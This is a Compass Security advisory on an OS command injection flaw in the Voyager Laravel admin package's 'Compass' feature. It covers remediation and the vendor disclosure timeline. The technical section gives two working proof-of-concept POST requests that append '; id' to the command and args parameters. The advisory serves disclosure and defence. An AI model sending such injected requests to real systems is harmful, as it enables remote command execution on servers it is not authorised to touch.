#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  Voyager
# Vendor:   The Control Group (Open Source)
# CSNC ID:  CSNC-2018-36
# Subject:  OS Command Injection (RCE)
# Risk:     High (CVSS 3.0 Base Score: 7.2)
# CVSS 3.0: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C
# Effect:   Remotely exploitable
# Author:   Fabio Poloni <fabio.poloni@compass-security.com>
# Date:     07.11.2018
#
#############################################################

Introduction
------------

Voyager [1] is a Laravel Admin Package that includes BREAD(CRUD) operations, a media manager, menu builder, and much more.

In the backend there is a so-called "Compass" that allows administrator to run simple maintenance tasks using `php artisan`. Commands and arguments are neither validated nor escaped and both can be used for OS Command Injection.

Affected
--------

Vulnerable:
 * Version 1.1.10

Other versions are not tested.


Technical Description
---------------------

It's possible to append arbitrary commands to the `args` and `command` parameter by appending them with a semicolon. (Note: Redirecting the output to `/dev/null` is not necessary, but keeps the output clean.)

`command`:

````
POST /admin/compass HTTP/1.1
Host: localhost:8000
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
Cookie: XSRF-TOKEN=[CUT]; laravel_session=[CUT]

_token=[...]&args=&command=help > /dev/null; id
````

`args`:

````
POST /admin/compass HTTP/1.1
Host: localhost:8000
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
Cookie: XSRF-TOKEN=[CUT]; laravel_session=[CUT]

_token=[...]&args= > /dev/null; id&command=help
````

Vulnerability Classification
----------------------------

* CVSS v3.0 Base Score: 7.2
* CVSS v3.0 Vector:     CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C

Remediation
-----------

Update to the latest release (1.2.0).

Please see Voyager releases [2] for release notes and download links.

Timeline
--------

2019-03-05:     According to vendor the vulnerability has been addressed (https://github.com/the-control-group/voyager/pull/3823)
2018-12-20:     Vulnerabilities confirmed
2018-12-18:     Fifth contact attempt via email to a former and current maintainer, response received
2018-11-23:     Forth contact attempt via email (hello@thecontrolgroup.com) and direct contact to employee on LinkedIn
2018-11-16:     Third contact attempt via email (hello@thecontrolgroup.com)
2018-11-14:     Second contact attempt via Twitter (@ControlGroup_SD)
2018-11-07:     Initial vendor notification via contact form (https://thecontrolgroup.com/contact)
2018-11-05:     Discovery by Fabio Poloni

References:
-----------

[1] https://github.com/the-control-group/voyager
[2] https://github.com/the-control-group/voyager/releases